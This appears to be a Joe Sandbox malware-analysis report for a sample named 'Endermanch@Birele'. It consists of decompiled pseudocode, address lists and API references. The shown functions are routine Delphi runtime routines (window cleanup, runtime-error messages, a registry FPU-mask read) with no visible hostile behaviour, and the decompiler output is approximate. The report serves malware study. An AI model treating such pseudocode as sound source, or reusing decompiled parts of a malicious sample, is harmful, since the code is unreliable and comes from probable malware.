                                                                                                                                                  0x00410145
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ffca
                                                                                                                                                  0x0040ffcd
                                                                                                                                                  0x0040ffdf
                                                                                                                                                  0x0040ffcf
                                                                                                                                                  0x0040ffd4
                                                                                                                                                  0x0040ffd4
                                                                                                                                                  0x0040ffee
                                                                                                                                                  0x0040fffa
                                                                                                                                                  0x0040fffd
                                                                                                                                                  0x0041006a
                                                                                                                                                  0x00410070
                                                                                                                                                  0x00410071
                                                                                                                                                  0x00410077
                                                                                                                                                  0x00410078
                                                                                                                                                  0x0041007a
                                                                                                                                                  0x0041007f
                                                                                                                                                  0x00410083
                                                                                                                                                  0x00410085
                                                                                                                                                  0x00410085
                                                                                                                                                  0x00410090
                                                                                                                                                  0x0041009b
                                                                                                                                                  0x004100a6
                                                                                                                                                  0x004100af
                                                                                                                                                  0x004100b2
                                                                                                                                                  0x004100ce
                                                                                                                                                  0x004100d5
                                                                                                                                                  0x004100e0
                                                                                                                                                  0x004100f7
                                                                                                                                                  0x004100fc
                                                                                                                                                  0x00410110
                                                                                                                                                  0x00410115
                                                                                                                                                  0x00410128
                                                                                                                                                  0x00410128
                                                                                                                                                  0x00410131
                                                                                                                                                  0x004100b4
                                                                                                                                                  0x004100b4
                                                                                                                                                  0x004100b5
                                                                                                                                                  0x004100bb
                                                                                                                                                  0x004100c1
                                                                                                                                                  0x004100c3
                                                                                                                                                  0x004100c5
                                                                                                                                                  0x004100c8
                                                                                                                                                  0x004100cb
                                                                                                                                                  0x004100cb
                                                                                                                                                  0x004100ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004100ce
                                                                                                                                                  0x0040ffff
                                                                                                                                                  0x0040ffff
                                                                                                                                                  0x00410000
                                                                                                                                                  0x00410002
                                                                                                                                                  0x00410008
                                                                                                                                                  0x0041000a
                                                                                                                                                  0x00410019
                                                                                                                                                  0x0041001a
                                                                                                                                                  0x00410024
                                                                                                                                                  0x00410025
                                                                                                                                                  0x0041002a
                                                                                                                                                  0x00410035
                                                                                                                                                  0x00410036
                                                                                                                                                  0x00410040
                                                                                                                                                  0x00410041
                                                                                                                                                  0x00410046
                                                                                                                                                  0x00410061
                                                                                                                                                  0x00410063
                                                                                                                                                  0x00410064
                                                                                                                                                  0x00410067
                                                                                                                                                  0x00410067
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410008
                                                                                                                                                  0x0040fffd

                                                                                                                                                  APIs
                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410025
                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410041
                                                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041007A
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004100F7
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410110
                                                                                                                                                  • VariantCopy.OLEAUT32(?), ref: 00410145
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 351091851-3916222277
                                                                                                                                                  • Opcode ID: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                                                                                                                                  • Instruction ID: c325ab6cb83a6390ee565100a5bef1b57817c6d02eb9309406d7edb258310792
                                                                                                                                                  • Opcode Fuzzy Hash: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                                                                                                                                  • Instruction Fuzzy Hash: 36510F7590021A9BCB21DB59C891BD9B7BCAF0C304F0041FAF508E7252D678AFC58F69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E004071E2(signed int __eax, void* __ecx) {
                                                                                                                                                  				signed int _t27;
                                                                                                                                                  				signed int _t39;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  				signed int _t50;
                                                                                                                                                  				signed int _t51;
                                                                                                                                                  
                                                                                                                                                  				_t39 = __eax;
                                                                                                                                                  				_t41 = E00407CF4(__eax);
                                                                                                                                                  				asm("jecxz 0x12");
                                                                                                                                                  				_t50 = _t39 ^  *(_t41 + 0xf2);
                                                                                                                                                  				_t51 = _t50;
                                                                                                                                                  				if(_t51 == 0) {
                                                                                                                                                  					 *(_t41 + 0xf2) = _t50;
                                                                                                                                                  				}
                                                                                                                                                  				asm("jecxz 0xa");
                                                                                                                                                  				ShowWindow( *(_t39 + 0x1c), 0);
                                                                                                                                                  				_t27 = _t39;
                                                                                                                                                  				E00405CBC();
                                                                                                                                                  				asm("bts dword [ebx+0x35], 0x3");
                                                                                                                                                  				if(_t51 >= 0) {
                                                                                                                                                  					 *((intOrPtr*)(_t39 + 0xca)) = 0;
                                                                                                                                                  					E00406808( *((intOrPtr*)(_t39 + 0xca)));
                                                                                                                                                  					E00406808( *((intOrPtr*)(_t39 + 0xee)));
                                                                                                                                                  					if( *(_t39 + 0x1c) != 0) {
                                                                                                                                                  						asm("jecxz 0x12");
                                                                                                                                                  						_t47 =  *((intOrPtr*)(_t39 + 0xfe)) + 1;
                                                                                                                                                  						if(_t47 != 0 && ( *(_t39 + 0x34) & 0x00000004) == 0) {
                                                                                                                                                  							DestroyCursor(_t47 - 1);
                                                                                                                                                  						}
                                                                                                                                                  						if(IsWindow( *(_t39 + 0x1c)) != 0) {
                                                                                                                                                  							SetWindowLongA( *(_t39 + 0x1c), 0xffffffeb, 0);
                                                                                                                                                  							DestroyWindow( *(_t39 + 0x1c));
                                                                                                                                                  						}
                                                                                                                                                  						 *(_t39 + 0x1c) = 0;
                                                                                                                                                  					}
                                                                                                                                                  					_push(0);
                                                                                                                                                  					if(( *(_t39 + 0x39) & 0x00000020) != 0) {
                                                                                                                                                  						_push( *((intOrPtr*)(_t39 + 0xea)));
                                                                                                                                                  					}
                                                                                                                                                  					asm("jecxz 0x3");
                                                                                                                                                  					_push( *((intOrPtr*)(_t39 + 0xe6)));
                                                                                                                                                  					L13:
                                                                                                                                                  					_pop(_t44);
                                                                                                                                                  					asm("jecxz 0xa");
                                                                                                                                                  					E00402658(_t44);
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				return _t27;
                                                                                                                                                  			}










                                                                                                                                                  0x004071e6
                                                                                                                                                  0x004071ed
                                                                                                                                                  0x004071ee
                                                                                                                                                  0x004071f2
                                                                                                                                                  0x004071f2
                                                                                                                                                  0x004071f8
                                                                                                                                                  0x004071fa
                                                                                                                                                  0x004071fa
                                                                                                                                                  0x00407203
                                                                                                                                                  0x00407208
                                                                                                                                                  0x0040720d
                                                                                                                                                  0x0040720f
                                                                                                                                                  0x00407214
                                                                                                                                                  0x00407219
                                                                                                                                                  0x00407221
                                                                                                                                                  0x00407227
                                                                                                                                                  0x00407232
                                                                                                                                                  0x0040723c
                                                                                                                                                  0x00407244
                                                                                                                                                  0x00407246
                                                                                                                                                  0x00407247
                                                                                                                                                  0x00407251
                                                                                                                                                  0x00407251
                                                                                                                                                  0x00407260
                                                                                                                                                  0x00407269
                                                                                                                                                  0x00407271
                                                                                                                                                  0x00407271
                                                                                                                                                  0x00407278
                                                                                                                                                  0x00407278
                                                                                                                                                  0x0040727b
                                                                                                                                                  0x00407281
                                                                                                                                                  0x00407283
                                                                                                                                                  0x00407283
                                                                                                                                                  0x0040728f
                                                                                                                                                  0x00407291
                                                                                                                                                  0x00407292
                                                                                                                                                  0x00407292
                                                                                                                                                  0x00407293
                                                                                                                                                  0x00407296
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407296
                                                                                                                                                  0x004072f4

                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00407208
                                                                                                                                                  • DestroyCursor.USER32(?), ref: 00407251
                                                                                                                                                  • IsWindow.USER32(?), ref: 00407259
                                                                                                                                                  • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00407269
                                                                                                                                                  • DestroyWindow.USER32(?,?,000000EB,00000000,?), ref: 00407271
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004072A5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Destroy$CursorDeleteLongObjectShow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 456105792-3916222277
                                                                                                                                                  • Opcode ID: 23ed33c5bcd0cc5be3f101e1f6a54e12245bd97385b514238246d13e070e42ba
                                                                                                                                                  • Instruction ID: 1aa22ef67bf754e5a406974058cf119eeac3fa97d4315ddcdd87a4db4b43ae75
                                                                                                                                                  • Opcode Fuzzy Hash: 23ed33c5bcd0cc5be3f101e1f6a54e12245bd97385b514238246d13e070e42ba
                                                                                                                                                  • Instruction Fuzzy Hash: 35316F71A092019ADB59BF21C885F673694EF00304F5488FFBD02BE1C7DA3DE8119A5D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E00403830(void* __ecx) {
                                                                                                                                                  				long _v4;
                                                                                                                                                  				int _t3;
                                                                                                                                                  
                                                                                                                                                  				if( *0x419044 == 0) {
                                                                                                                                                  					if( *0x418030 == 0) {
                                                                                                                                                  						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                                                                  					}
                                                                                                                                                  					return _t3;
                                                                                                                                                  				} else {
                                                                                                                                                  					if( *0x419218 == 0xd7b2 &&  *0x419220 > 0) {
                                                                                                                                                  						 *0x419230();
                                                                                                                                                  					}
                                                                                                                                                  					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                                                                  					return WriteFile(GetStdHandle(0xfffffff5), 0x4038b8, 2,  &_v4, 0);
                                                                                                                                                  				}
                                                                                                                                                  			}





                                                                                                                                                  0x00403838
                                                                                                                                                  0x00403898
                                                                                                                                                  0x004038a8
                                                                                                                                                  0x004038a8
                                                                                                                                                  0x004038ae
                                                                                                                                                  0x0040383a
                                                                                                                                                  0x00403843
                                                                                                                                                  0x00403853
                                                                                                                                                  0x00403853
                                                                                                                                                  0x0040386f
                                                                                                                                                  0x00403890
                                                                                                                                                  0x00403890

                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE,?,?,?,?,?,?,?,0040399E,004026D3), ref: 00403869
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE,?,?,?,?,?,?,?,0040399E), ref: 0040386F
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,004038B8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE), ref: 00403884
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,004038B8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,004038FE), ref: 0040388A
                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004038A8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                                                  • Opcode ID: 66f489a76bdded7ab0662bc3b4cdd2177284456a9c4f740b5969ec60df8e6194
                                                                                                                                                  • Instruction ID: a631a757e5c2189165fce7d7760e516ff7165c4c80e5b59565c1e8de73c670d0
                                                                                                                                                  • Opcode Fuzzy Hash: 66f489a76bdded7ab0662bc3b4cdd2177284456a9c4f740b5969ec60df8e6194
                                                                                                                                                  • Instruction Fuzzy Hash: 6EF0627168434878E72477609D16F9A3A8C570CB15F24CABFF610780E2C7BC49C8822D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040CC10(void* __edx, void* __edi, void* __fp0) {
                                                                                                                                                  				void _v1024;
                                                                                                                                                  				char _v1088;
                                                                                                                                                  				long _v1092;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				char* _t14;
                                                                                                                                                  				intOrPtr _t16;
                                                                                                                                                  				intOrPtr _t18;
                                                                                                                                                  				intOrPtr _t24;
                                                                                                                                                  				long _t32;
                                                                                                                                                  
                                                                                                                                                  				E0040CA88(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                                                                                                                  				_t14 =  *0x418660; // 0x419044
                                                                                                                                                  				if( *_t14 == 0) {
                                                                                                                                                  					_t16 =  *0x418558; // 0x4088fc
                                                                                                                                                  					_t9 = _t16 + 4; // 0xffe8
                                                                                                                                                  					_t18 =  *0x419660; // 0x400000
                                                                                                                                                  					LoadStringA(E004048BC(_t18),  *_t9,  &_v1088, 0x40);
                                                                                                                                                  					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                                                                                                  				}
                                                                                                                                                  				_t24 =  *0x41857c; // 0x419214
                                                                                                                                                  				E0040272C(E0040288C(_t24));
                                                                                                                                                  				CharToOemA( &_v1024,  &_v1024);
                                                                                                                                                  				_t32 = E00409ED0( &_v1024, __edi);
                                                                                                                                                  				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                                                                                                                  				return WriteFile(GetStdHandle(0xfffffff4), 0x40ccd4, 2,  &_v1092, 0);
                                                                                                                                                  			}












                                                                                                                                                  0x0040cc1f
                                                                                                                                                  0x0040cc24
                                                                                                                                                  0x0040cc2c
                                                                                                                                                  0x0040cc93
                                                                                                                                                  0x0040cc98
                                                                                                                                                  0x0040cc9c
                                                                                                                                                  0x0040cca7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ccbd
                                                                                                                                                  0x0040cc2e
                                                                                                                                                  0x0040cc38
                                                                                                                                                  0x0040cc47
                                                                                                                                                  0x0040cc57
                                                                                                                                                  0x0040cc6a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040CA88: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CAA5
                                                                                                                                                    • Part of subcall function 0040CA88: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CAC9
                                                                                                                                                    • Part of subcall function 0040CA88: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CAE4
                                                                                                                                                    • Part of subcall function 0040CA88: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0040CB7A
                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 0040CC47
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040CC64
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CC6A
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,0040CCD4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CC7F
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,0040CCD4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CC85
                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 0040CCA7
                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040CCBD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 185507032-0
                                                                                                                                                  • Opcode ID: 368da9933a34329ca827390007981b96a17e630d85f57cb8d8c292548cd21b58
                                                                                                                                                  • Instruction ID: dde01d23e6afb3a9f06864aaa6cde776362b0f57c47d944cf77e5eae6f11e29d
                                                                                                                                                  • Opcode Fuzzy Hash: 368da9933a34329ca827390007981b96a17e630d85f57cb8d8c292548cd21b58
                                                                                                                                                  • Instruction Fuzzy Hash: CA111FB2154204AED200F7A5CC86F9B77ACAB44704F80463FB754E71E2DA78E9449B6E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E00402D98() {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				signed short _t12;
                                                                                                                                                  				signed short _t14;
                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				intOrPtr _t32;
                                                                                                                                                  
                                                                                                                                                  				_t29 = _t31;
                                                                                                                                                  				_t32 = _t31 + 0xfffffff4;
                                                                                                                                                  				_v12 =  *0x418024 & 0x0000ffff;
                                                                                                                                                  				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                                                                  					_t12 =  *0x418024; // 0x1332
                                                                                                                                                  					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                                                                                  					 *0x418024 = _t14;
                                                                                                                                                  					return _t14;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_t29);
                                                                                                                                                  					_push(E00402E09);
                                                                                                                                                  					_push( *[fs:eax]);
                                                                                                                                                  					 *[fs:eax] = _t32;
                                                                                                                                                  					_v16 = 4;
                                                                                                                                                  					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                                                                  					_pop(_t27);
                                                                                                                                                  					 *[fs:eax] = _t27;
                                                                                                                                                  					_push(0x402e10);
                                                                                                                                                  					return RegCloseKey(_v8);
                                                                                                                                                  				}
                                                                                                                                                  			}












                                                                                                                                                  0x00402d99
                                                                                                                                                  0x00402d9b
                                                                                                                                                  0x00402da5
                                                                                                                                                  0x00402dc1
                                                                                                                                                  0x00402e10
                                                                                                                                                  0x00402e22
                                                                                                                                                  0x00402e25
                                                                                                                                                  0x00402e2e
                                                                                                                                                  0x00402dc3
                                                                                                                                                  0x00402dc5
                                                                                                                                                  0x00402dc6
                                                                                                                                                  0x00402dcb
                                                                                                                                                  0x00402dce
                                                                                                                                                  0x00402dd1
                                                                                                                                                  0x00402ded
                                                                                                                                                  0x00402df4
                                                                                                                                                  0x00402df7
                                                                                                                                                  0x00402dfa
                                                                                                                                                  0x00402e08
                                                                                                                                                  0x00402e08

                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DBA
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DED
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00402E10,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402E03
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                                                  • Opcode ID: 67336588137742afaa6a361b3752e4063beb9b9ae596f806d9355139b5fbc234
                                                                                                                                                  • Instruction ID: ad6bd215342f7588ae9e52c32b31fbfb63ae62d1ae1e48a1402ae786e0266473
                                                                                                                                                  • Opcode Fuzzy Hash: 67336588137742afaa6a361b3752e4063beb9b9ae596f806d9355139b5fbc234
                                                                                                                                                  • Instruction Fuzzy Hash: BF015275940608BAD711DB90DD46BEA77B9D708B00F2105BABA04F65D0E6B85A50869C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                  			E00407BA2(intOrPtr __eax, intOrPtr* __ecx, void* __edx) {
                                                                                                                                                  				int _t39;
                                                                                                                                                  				char _t41;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  				intOrPtr _t44;
                                                                                                                                                  				intOrPtr _t48;
                                                                                                                                                  				signed int* _t50;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				void** _t55;
                                                                                                                                                  				long _t65;
                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				void* _t88;
                                                                                                                                                  				intOrPtr _t92;
                                                                                                                                                  
                                                                                                                                                  				_t74 = __ecx;
                                                                                                                                                  				_t72 = __eax;
                                                                                                                                                  				_t88 = __edx;
                                                                                                                                                  				_t82 =  *((intOrPtr*)(__edx + 4)) - 0xbd32;
                                                                                                                                                  				_t95 = _t82 - 6;
                                                                                                                                                  				if(_t82 > 6) {
                                                                                                                                                  					__eflags =  *((short*)(__edx + 4)) - 0xb005;
                                                                                                                                                  					if( *((short*)(__edx + 4)) != 0xb005) {
                                                                                                                                                  						L18:
                                                                                                                                                  						_t39 = 0;
                                                                                                                                                  						__eflags =  *((short*)(_t88 + 4)) - 7;
                                                                                                                                                  						if( *((short*)(_t88 + 4)) != 7) {
                                                                                                                                                  							goto L23;
                                                                                                                                                  						}
                                                                                                                                                  						 *_t74 = 0;
                                                                                                                                                  						_t41 = E00407CF4(_t72);
                                                                                                                                                  						__eflags = _t41;
                                                                                                                                                  						if(_t41 == 0) {
                                                                                                                                                  							goto L5;
                                                                                                                                                  						}
                                                                                                                                                  						_push(_t41);
                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t41 + 0xf2));
                                                                                                                                                  						asm("jecxz 0x19");
                                                                                                                                                  						__eflags = _t75 - _t72;
                                                                                                                                                  						if(_t75 != _t72) {
                                                                                                                                                  							_t44 =  *((intOrPtr*)(_t75 + 0x50));
                                                                                                                                                  							_t82 = _t44;
                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0xa8))))();
                                                                                                                                                  						}
                                                                                                                                                  						_pop(_t42);
                                                                                                                                                  						 *((intOrPtr*)(_t42 + 0xf2)) = _t72;
                                                                                                                                                  						_t39 = 0;
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						_push(_t82);
                                                                                                                                                  						goto L23;
                                                                                                                                                  					}
                                                                                                                                                  					_push(__ecx);
                                                                                                                                                  					_t78 =  *(__edx + 0xa) & 0x0000ffff;
                                                                                                                                                  					_t92 =  *((intOrPtr*)(__eax + 0x4c));
                                                                                                                                                  					__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                  					if(_t78 !=  *((intOrPtr*)(_t92 + 0x20))) {
                                                                                                                                                  						_t48 =  *((intOrPtr*)(__eax + 0x4c));
                                                                                                                                                  						__eflags = _t78 -  *((intOrPtr*)(_t48 + 0x22));
                                                                                                                                                  						_t50 =  *((intOrPtr*)(__eax + 0x50)) + 0x98;
                                                                                                                                                  						if(_t78 ==  *((intOrPtr*)(_t48 + 0x22))) {
                                                                                                                                                  							L13:
                                                                                                                                                  							_t78 =  *_t50;
                                                                                                                                                  							 *( *_t50)();
                                                                                                                                                  							L16:
                                                                                                                                                  							_t53 = E004078A0(_t72, _t88);
                                                                                                                                                  							goto L4;
                                                                                                                                                  						}
                                                                                                                                                  						_t50 =  &(_t50[2]);
                                                                                                                                                  						__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x24));
                                                                                                                                                  						if(_t78 ==  *((intOrPtr*)(_t92 + 0x24))) {
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  						_t50 = _t50 - 0x10;
                                                                                                                                                  						__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x26));
                                                                                                                                                  						if(_t78 !=  *((intOrPtr*)(_t92 + 0x26))) {
                                                                                                                                                  							__eflags = _t78 -  *((intOrPtr*)(_t92 + 0x28));
                                                                                                                                                  							if(_t78 !=  *((intOrPtr*)(_t92 + 0x28))) {
                                                                                                                                                  								_pop(_t74);
                                                                                                                                                  								goto L18;
                                                                                                                                                  							}
                                                                                                                                                  							_t38 = E004064E8(__eax);
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						goto L13;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags =  *((char*)(__eax + 0x12a));
                                                                                                                                                  					if( *((char*)(__eax + 0x12a)) <= 0) {
                                                                                                                                                  						E004080F4(__eax, 1);
                                                                                                                                                  						E00407CE0(_t72);
                                                                                                                                                  					}
                                                                                                                                                  					goto L16;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(__ecx);
                                                                                                                                                  					SetTextColor( *(__edx + 8), E00406A10( *((intOrPtr*)(__eax + 0xa0)), _t95));
                                                                                                                                                  					if(( *(_t72 + 0x35) & 0x00000001) == 0) {
                                                                                                                                                  						_t65 = E00406A10( *((intOrPtr*)(_t72 + 0xa4)), __eflags);
                                                                                                                                                  						SetBkMode( *(__edx + 8), 2);
                                                                                                                                                  						SetBkColor( *(__edx + 8), _t65);
                                                                                                                                                  						_t53 =  *0x418100();
                                                                                                                                                  					} else {
                                                                                                                                                  						SetBkMode( *(__edx + 8), 1);
                                                                                                                                                  						_t53 = GetStockObject(5);
                                                                                                                                                  					}
                                                                                                                                                  					L4:
                                                                                                                                                  					_pop(_t55);
                                                                                                                                                  					 *_t55 = _t53;
                                                                                                                                                  					L5:
                                                                                                                                                  					_t39 = 1;
                                                                                                                                                  					L23:
                                                                                                                                                  					return _t39;
                                                                                                                                                  				}
                                                                                                                                                  			}

















                                                                                                                                                  0x00407ba2
                                                                                                                                                  0x00407ba5
                                                                                                                                                  0x00407ba8
                                                                                                                                                  0x00407bad
                                                                                                                                                  0x00407bb2
                                                                                                                                                  0x00407bb6
                                                                                                                                                  0x00407c19
                                                                                                                                                  0x00407c1f
                                                                                                                                                  0x00407c94
                                                                                                                                                  0x00407c94
                                                                                                                                                  0x00407c96
                                                                                                                                                  0x00407c9b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407c9d
                                                                                                                                                  0x00407ca1
                                                                                                                                                  0x00407ca6
                                                                                                                                                  0x00407ca8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407cae
                                                                                                                                                  0x00407caf
                                                                                                                                                  0x00407cb5
                                                                                                                                                  0x00407cb7
                                                                                                                                                  0x00407cb9
                                                                                                                                                  0x00407cbc
                                                                                                                                                  0x00407cc5
                                                                                                                                                  0x00407ccc
                                                                                                                                                  0x00407ccc
